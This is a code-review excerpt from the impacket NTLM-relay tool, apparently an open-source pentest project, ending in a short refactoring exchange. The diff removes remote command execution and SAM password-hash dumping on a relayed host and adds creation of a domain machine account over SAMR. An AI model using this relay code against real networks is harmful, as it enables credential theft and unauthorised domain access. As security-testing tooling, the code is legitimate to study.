impacket/examples/ntlmrelayx/attacks/smbattack.py

```diff
@@ -65,55 +68,125 @@ def run(self):
-                    remoteOps._RemoteOperations__executeRemote(self.config.command)
-                    LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
-                    self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
-                    self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
-                    print(self.__answerTMP.decode(self.config.encoding, 'replace'))
-                else:
-                    bootKey = remoteOps.getBootKey()
-                    remoteOps._RemoteOperations__serviceDeleted = True
-                    samFileName = remoteOps.saveSAM()
-                    samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
-                    samHashes.dump()
-                    samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
-                    LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
-            except Exception as e:
-                LOG.error(str(e))
-            finally:
-                if samHashes is not None:
-                    samHashes.finish()
-                if remoteOps is not None:
-                    remoteOps.finish()
+                    remoteOps  = RemoteOperations(self.__SMBConnection, False)
+                    remoteOps.connectSamr(remoteOps.getMachineNameAndDomain()[1])
+                except Exception as e:
+                    if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
+                        LOG.info("SAMR access denied")
+                    LOG.error(str(e))
+                    return
+
+                LOG.info("Machine account addition via SMB")
+                try:
+                    LOG.info("Target domain SID: " + remoteOps.getDomainSid())
+
+                    if not self.config.addComputerSMB:
+                        computerName = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
+                    else:
+                        computerName = self.config.addComputerSMB[0]
+
+                    # Code from the addComputer.py script
+                    try:
+                        createUser = samr.hSamrCreateUser2InDomain(remoteOps.getSamr(), remoteOps.getDomainHandle(), computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE)
+                    except samr.DCERPCSessionError as e:
+                        if e.error_code == 0xc0000022:
+                            raise Exception("Relayed user doesn't have right to create a machine account!")
+                        elif e.error_code == 0xc00002e7:
+                            raise Exception("Relayed user machine quota exceeded!")
+                        elif e.error_code == 0xc0000062:
+                            raise Exception("Account name not accepted, maybe the '$' at the end is missing ?")
+                        else:
+                            raise e
```

Comment:
Maybe some of this code can be abstracted somewhere in the `samr` module to avoid duplication?

Reply:
Done, I have moved the exception handles into the samr function hSamrCreateUser2InDomain and remove it from smbattack.py and addcomputer.py